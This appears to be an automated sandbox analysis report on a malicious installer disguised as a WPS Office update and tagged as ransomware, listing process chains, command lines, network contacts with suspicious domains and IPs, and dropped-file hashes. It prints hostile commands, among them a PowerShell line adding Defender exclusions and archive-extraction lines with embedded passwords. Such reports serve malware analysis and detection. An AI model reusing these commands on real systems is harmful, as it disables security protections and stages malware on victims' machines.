PID 2372 wrote to memory of 3204 N/A C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe
PID 2372 wrote to memory of 3204 N/A C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe
PID 3204 wrote to memory of 1012 N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe
PID 3204 wrote to memory of 1012 N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe
PID 3204 wrote to memory of 1012 N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\wpsupdate.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\System32\MsiExec.exe

C:\Windows\System32\MsiExec.exe -Embedding 19DCCF2A218FDB0F52612F3CC81E7863 E Global\MSI0000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\TransformOptimisticContributor','C:\Program Files','C:\Program Files'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /min "" "C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\YRtKSPCVXxSCmPuaAzactTPSddUXyw" -o"C:\Program Files\TransformOptimisticContributor\" -p"03621GQD}PR[O^Dmi;;h" -y & ping 127.0.0.1 -n 2 & start /min "" "C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL" -x!1_WSEcydALszNI.exe -x!sss -x!1_OzasXnwPtTbfCAAsrowrLIIDEPUHpa.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\TransformOptimisticContributor\" -p"93629#*_tvw?-L5@gQl=" -y

C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe

"C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\YRtKSPCVXxSCmPuaAzactTPSddUXyw" -o"C:\Program Files\TransformOptimisticContributor\" -p"03621GQD}PR[O^Dmi;;h" -y

C:\Windows\system32\PING.EXE

ping 127.0.0.1 -n 2

C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe

"C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL" -x!1_WSEcydALszNI.exe -x!sss -x!1_OzasXnwPtTbfCAAsrowrLIIDEPUHpa.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\TransformOptimisticContributor\" -p"93629#*_tvw?-L5@gQl=" -y

C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe

"C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe" -number 177 -file file3 -mode mode3

C:\Program Files\TransformOptimisticContributor\wpsupdate.exe

"C:\Program Files\TransformOptimisticContributor\wpsupdate.exe"

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.vbs"

C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe

"C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe" install

C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe

"C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe" start

C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe

"C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe"

C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe

"C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe" -number 151 -file file3 -mode mode3

C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe

"C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe" -number 62 -file file3 -mode mode3

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 57.110.18.2.in-addr.arpa udp
US 8.8.8.8:53 im.qq.com udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 fgfdg5631gfd.icu udp
HK 38.47.221.103:80 fgfdg5631gfd.icu tcp
US 8.8.8.8:53 103.221.47.38.in-addr.arpa udp
HK 202.95.11.159:10200 tcp
US 8.8.8.8:53 qweaq.club udp
US 148.178.21.107:29320 qweaq.club tcp
HK 202.95.11.163:10200 tcp
US 8.8.8.8:53 updatepro.wps.cn udp
HK 202.95.11.159:10200 tcp
HK 202.95.11.163:10200 tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 qweaq.shop udp
US 148.178.21.107:29320 qweaq.shop tcp
HK 202.95.11.159:10200 tcp
HK 202.95.11.163:10200 tcp
HK 202.95.11.159:10200 tcp
US 148.178.21.107:29320 qweaq.shop tcp
HK 202.95.11.163:10200 tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
HK 202.95.11.159:10200 tcp
HK 202.95.11.163:10200 tcp
US 148.178.21.107:29320 qweaq.shop tcp
HK 202.95.11.159:10200 tcp
HK 202.95.11.163:10200 tcp
HK 202.95.11.159:10200 tcp
HK 202.95.11.163:10200 tcp
US 148.178.21.107:29320 qweaq.shop tcp
HK 202.95.11.159:10200 tcp
US 8.8.8.8:53 136.71.105.51.in-addr.arpa udp
HK 202.95.11.163:10200 tcp

Files

memory/1788-22-0x0000029231DB0000-0x0000029231DD2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tz2uhmuv.pcu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe

MD5 c31c4b04558396c6fabab64dcf366534
SHA1 fa836d92edc577d6a17ded47641ba1938589b09a
SHA256 9d182f421381429fd77598feb609fefb54dcaef722ddbf5aa611b68a706c10d3
SHA512 814dcbc1d43bc037dadc2f3f67856dd790b15fc1b0c50fa74a169c8cc02cdc79d44f1f10e200ef662eee20cd6b5ca646ec4e77673e3fe3cb7dfb7649243f6e99

C:\Program Files\TransformOptimisticContributor\YRtKSPCVXxSCmPuaAzactTPSddUXyw

MD5 831ff4029b30419da4ac4d32bf8ff05c
SHA1 8c121d0cd017ce5f7ca8cbf6abd8909b2fe445bc
SHA256 ab281716242897be222c1d4cc979fd5de9e7d1cde56e70ac1010e6b3dc76826d
SHA512 17f2efdb891dcf9ceacb8b24801ec59866f969baa55d1c92c15a7150c13f18cc3f481984b5971456e1ad0f204db016698bfe012c086ffa2028582c1d9302a8c5

C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL

MD5 d045828473a8165effd59a97232e6107
SHA1 f86bd9763d6c70ec3ca79134598de4fa44c6bc94
SHA256 9aaae0f7b3bdab287ad703c7eb4baa1a0746b6d353e57ae74d985b10a2102016
SHA512 07e77aa6a433d4541d80276d37e682012509b480a6861f9fbe3cd89929b352d6754cc649526f95c4bd76cf4e1c8bceb275a0217c38193ab88891166934d79659

C:\Program Files\TransformOptimisticContributor\2_WSEcydALszNI.exe

MD5 fb22fb79f366c65257b7adb24c70d843
SHA1 ca6d29a4806d52350e1a50c7b71526dfaab2d525
SHA256 44f2ea5b5dd47fc256a341dee1d2dacfc24adba395a49fd8c4ad3613bfe2d43d
SHA512 c4dfb9273bd937f5480646e12d77073a476719f1f15ee5885e0999f0bbc68f80b1909489f7bd78a3bfb4687a55442f655f4538fda20afe4a7b87623e9bdfe7d9

C:\Program Files\TransformOptimisticContributor\wpsupdate.exe

MD5 57dadd6a929f64c2b1efe2d52c1c4985
SHA1 962cb227f81f885f23826c3e040aa9dbc97659cf
SHA256 996b5d59cce7955b4374bd00d83c422d3a1d9ffebba59c66074c37ab28cfaeb5
SHA512 3f64c35e72698ea6a7e708a4367277f3ab62c27f0652e0c55bab6e02239ee37c4f0a21503c0688301fb77bbf8e59e3c5c8aa2df8d62a4ab8a9b9cdf6f0a775cf

C:\Config.Msi\e57c535.rbs

MD5 c7e1ebe7390d2e66b50a83e64810d58a
SHA1 b4d89256f560a43b404178cb144389bb91eb9d53
SHA256 edb11ce6d0b03289a4624112c393f91674af7cb8b3e0ac40ce5a7be5a7aa4dc6
SHA512 3650053a3e66f4e9d2d5079c38cbe596c8f951d8b06ff0357de279b2a709a816dabe75348424ac3ee20e457e24d5e57aa715abb0e7eb4e4dfa6f9ad8bc779cea

C:\Windows\Installer\e57c534.msi

MD5 ef294458016f546c5eebd07d2dd98bad
SHA1 66bb14f670055272e12899d401b8668cad15fac9
SHA256 c17c018f5df7a413dc053a325b6c291c9cd84f1b9e2415ffe205e02a7e5d6b4a
SHA512 97ee150f49bb587147f30d2215174f5376420abd5d659a2c68d58bc67f823715030cc328eab7e11623f4ee8504f1f080ceb44ac2d6fca7c636ea8d7c936f0333

memory/3400-70-0x000000002A5A0000-0x000000002A5CF000-memory.dmp

C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe

MD5 d305d506c0095df8af223ac7d91ca327
SHA1 679cb4c763c84e75ccb0fa3475bd6b7a36e81c4a
SHA256 923111c7142b3dc783a3c722b19b8a21bcb78222d7a136ac33f0ca8a29f4cb66
SHA512 94d369a4db88bff9556a1d7a7fb0188ed935c3592bae09335542c5502ec878e839177be63ac3ab4af75d4dc38a3a4f5d0fd423115ac72cf5dd710c59604db796

C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.vbs

MD5 c5053a9c469416b52ac1ef0f3c4b6f3a
SHA1 1b2a53afcb6b22db953ad16116642a5e603d59c6
SHA256 7c54fccfbce7fef4dcd82fedd5811f43b553fca88811ace4e37d0837923830e5
SHA512 b9df8e58a1eabff54635a776a1c80c3c42643e3ad3ca3245eb0428b3e779ab903fcd2260d529c5fa34bb0f6b9dc62002cf1c0ba9e0d439b6905b12c837359ffa

memory/3276-76-0x0000000000B90000-0x0000000000C66000-memory.dmp

C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.xml

MD5 423a8dfeda50218b0d1f99440f1f19bb
SHA1 5979983be9657f79aa8523018779fef0ff004282
SHA256 c88617337e75ec9a2a8c9b5a589957f2df36dd28c9d5aeb5c1453e71b6fb3c02
SHA512 19f4764a3d46de34eb707e1f50685282bfd49d766d1cd8482dae6bd09ed382021dd09e5e9f506e4b2c402c89a29c5fad78ff68d29fda8ba33310c81b74467ab9

\??\Volume{77a2731a-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{add72fab-36a5-4af6-b688-aed4c2a3c599}_OnDiskSnapshotProp

MD5 913af514371d9139d3555bf6f30e00bf
SHA1 2cf7498a389405061ee1ab18768066bfa8bfc5ec
SHA256 05c660ba34fa559fc78c5320a4cbfd64035a3687bf7fb374f12248f5674225f3
SHA512 896b5d37159a08d0b4f8b0a7f8e38a0f82f4bda4dfde9c06b44f57544b2acbf9c2b974b283da24f92a9fee5eefcecc8eb621681a3cd994c3959a80c466111007

\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

MD5 7016a78c3f2c8d79790a0b85a2bf6735
SHA1 9f81373df94b4fd8dc517cd87853bff8ec0b88c2
SHA256 2b18d5f2c13af9bb984eb8672facfed4f8400a98b278c40aaef7b32b157ab5bb
SHA512 0cf232782263dc1f9b942f83a4b553cae72ae8bfbaf04b955d8c31daa5f3ec4bfb9c37a3c9224c304aa1b0f50c3e44d8cd28c58701e588df2dbb752fa0ceeb8d

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\nKecPJAaIeFB.exe.log

MD5 122cf3c4f3452a55a92edee78316e071
SHA1 f2caa36d483076c92d17224cf92e260516b3cbbf
SHA256 42f5774d1ee4cae5d7a4e83970da42bb17e61ae93c312247211b5ee3535662e0
SHA512 c98666fb86aaff6471c0a96f12f037b9a607579c5891c9d7ba8cd4e90506ca7aa5b5f6264081d25f703c88fb69d8e2cd87809d508e771770550d0c5d4d17d91c

C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.wrapper.log

MD5 9f41a0f5706cb8f9dd5d020cb21f4eb0
SHA1 b1a7953a58902f4da009ea36adb95a789d0f2301
SHA256 4029dba7fdd57aeeccf3927bc7e8b3c9c7f7db0f9786f72d3903f42eb81d3bcf
SHA512 2705f09ec6e8b38500933bad6f42a72e02efe36011c3b066795edab2c978fbd76e95b1074fa466c5b9c25c53b682450a93bb2faeb4f0952bbaba5f868da671c7

C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.wrapper.log

MD5 17857fb897c8697bde9859d4c40d7999
SHA1 7a375c34af7a8c3fdd925294860e888aded60961
SHA256 fc13425778d61df7cf32d76662651d0c5aee534dd099f1c1c0a175d705e21b5d
SHA512 c874eca2435e7e56b593ce071304b1766c829a1b626f03474e79f4e7f0e8d89b93e3dd55d7f251fd91c6bc0142cf073b619bb030e56d4a40d2ada4f64c6c14bf

C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.wrapper.log

MD5 c4f8f8d71ba256f312aa991b91b6d584
SHA1 958fe95a729cad4a62972639d6a9ea38170fad1a
SHA256 5cefa51c97d25b3cf0773dbe57280760f2f5c50e5a8f65eb81fd87b818436e14
SHA512 8db01ea0832d408875683462f466705786af407a1e6ae628a15a37dbdbd858a196e116c515c2bc33329c407dd314dcc731a802e22b9f743b647d5b1acc3e6bf7

C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.wrapper.log

MD5 bf9b5faf7dbb1b48767088202a970d58
SHA1 4aef7d9d9a41959733803868be8b38f07bcff49c
SHA256 1bf45045df02990b5fac5b9edcfa4f1724c473acc4b45094b77ef4fa2002cf2a
SHA512 64f061272ff3ab5c8117dde190a9729e08e853a43be984c7840cdd78c2864dd5cc57f5a22f72501e4ea4a6d87050e6bc7dd860799cc9d956ee6882592e1d16ba

memory/1012-109-0x0000000029F50000-0x0000000029F9D000-memory.dmp

memory/1012-110-0x000000002BB60000-0x000000002BD1D000-memory.dmp

C:\Users\Admin\AppData\Roaming\kingsoft\office6\log\update\wpsupdate_2024_11_19.log

MD5 322e3d0221747822554fd768a5230ed9
SHA1 127fce47b068c04e44ee90040f9e3c4ce660d4f9
SHA256 4fccfa2d971437db8eae2d7706f56ac24c64f5d066595004fdabf751ff442683
SHA512 30f512af0412a454332a19d0cb452ee20382ee653116f86a58549f9e0c56536bae3cda1ab2cfbbedb1e245dd705f81d001e103d5a0773c53f23c0b20cd4d8b52